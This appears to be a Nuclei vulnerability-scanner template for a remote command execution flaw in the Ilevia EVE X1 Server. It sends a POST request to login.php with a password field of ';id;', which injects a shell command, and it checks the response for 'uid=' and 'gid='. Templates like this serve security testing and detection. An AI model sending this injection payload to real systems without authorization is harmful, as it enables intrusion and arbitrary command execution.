id: Ilevia-EVE-X1-Server-login_php-RCE

info:
  name: Ilevia EVE X1 Server login.php 远程命令执行漏洞
  author: Ilevia
  severity: high
  tags: RCE

http:
  - raw:
      - |
        POST /ajax/php/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        userid=george&passwd=;id;
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "uid="
          - "gid="
        condition: and
      - type: status
        status: 
          - 200